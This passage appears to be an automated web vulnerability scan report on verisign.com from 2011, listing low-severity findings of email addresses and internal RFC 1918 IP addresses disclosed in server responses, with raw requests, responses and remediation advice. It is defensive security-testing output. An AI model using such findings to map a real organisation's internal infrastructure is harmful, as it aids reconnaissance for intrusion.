HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.60. http://www.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET / HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:24:37 GMT Content-Type: text/html Content-Length: 34615 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.61. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
Issue detail
The following email addresses were disclosed in the response:channel-partners@verisign.com support@verisign.com
Request
GET /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581
Response
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:14 GMT Server: Apache X-Powered-By: PHP/5.2.13 Content-Type: text/html Content-Length: 77864 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]... <a href="mailto:support@verisign.com ">support@verisign.com </a>...[SNIP]...
17.62. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.hover_intent.js
Issue detail
The following email address was disclosed in the response:
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1614 Content-Type: text/html /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]... <brian@cherne.net >...[SNIP]...
17.63. http://www.verisign.com/code-signing/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/code-signing/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /code-signing/index.html?tid=a_box HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:08 GMT Content-Type: text/html Content-Length: 103179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--HEADER ASSETS...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.64. http://www.verisign.com/partners/ssl-reseller-programs/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/partners/ssl-reseller-programs/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /partners/ssl-reseller-programs/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:13 GMT Content-Type: text/html Content-Length: 51846 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.65. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623590|PC#1315621455064-973488.19#1378693730|check#true#1315621790; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1315509977-2-99____; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.9.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:24 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:24 GMT Content-Type: text/html Content-Length: 34515 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.66. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/partners/ssl-reseller-programs/resell-ssl/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /partners/ssl-reseller-programs/resell-ssl/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.8.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509963-1-99____; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:19 GMT Content-Type: text/html Content-Length: 37523 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.67. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/ssl/buy-ssl-certificates/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /ssl/buy-ssl-certificates/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Type: text/html Content-Length: 104571 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" /> <!--HEADER ASSETS--> <link href="ht...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.68. http://www.verisign.com/trust-seal/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/trust-seal/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:13 GMT Content-Type: text/html Content-Length: 49851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META HTTP-EQUIV="X-UA-Comp...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.69. http://www.verisign.com/verisign-worldwide/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/verisign-worldwide/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /verisign-worldwide/index.html?tid=footer HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:10 GMT Content-Type: text/html Content-Length: 42646 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.70. https://www.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET / HTTP/1.1 Host: www.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:30:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:30:44 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 34637 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.71. https://www.verisign.com/products-services/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/products-services/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /products-services/index.html HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://securitycenter.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:46 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 107427 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
18. Private IP addresses disclosed
previous
next
There are 3 instances of this issue:
Issue background
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways. Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
18.1. http://query.verisign.com/cluster.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.com
Path:
/cluster.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /cluster.js HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:45 GMT Content-Type: application/x-javascript Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 8783 Cache-Control: public, max-age=31622400 Expires: Sun, 09 Sep 2012 21:24:45 GMT Vary: Accept-Encoding // Copyright 2006 Google Inc., All Rights Reserved // dspencer@google.com /** * @fileoverview * * This file is for the rendering of Clustered Search results * on the GSA. * * * The flow is:...[SNIP]... put=xml_no_dtd&sort=date%3AD%3AL%3Ad1& * ie=UTF-8&btnG=Google+Search&client=f7&q=china&ud=1& * site=default_collection&oe=UTF-8&proxystylesheet=f7& * ip=172.18.68.100 " * * @param {Function} render: The rendering function which is called on * completion with 2 arguments, the search URL (the arg above) and the JSON * blob that comes back from the CS. *...[SNIP]...
18.2. http://query.verisign.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.com
Path:
/search
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:07 GMT Server: saws Cache-Control: private Content-Type: text/html Vary: Accept-Encoding Content-Length: 52678 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <body onload="pruneHeaders();resetForms(); cs_loadClusters('q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108 &access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1', cs_drawClusters); " dir="ltr">...[SNIP]... itesearch=https://knowledge.verisign.com/support/mpki-for-ssl-support/index&q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108 &access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1">...[SNIP]... earch=https://knowledge.verisign.com/support/ssl-certificates-support/index&q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108 &access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1">...[SNIP]... <a href="search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108 &access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1&filter=0">...[SNIP]...
18.3. https://query.verisign.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://query.verisign.com
Path:
/search
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /search HTTP/1.1 Host: query.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
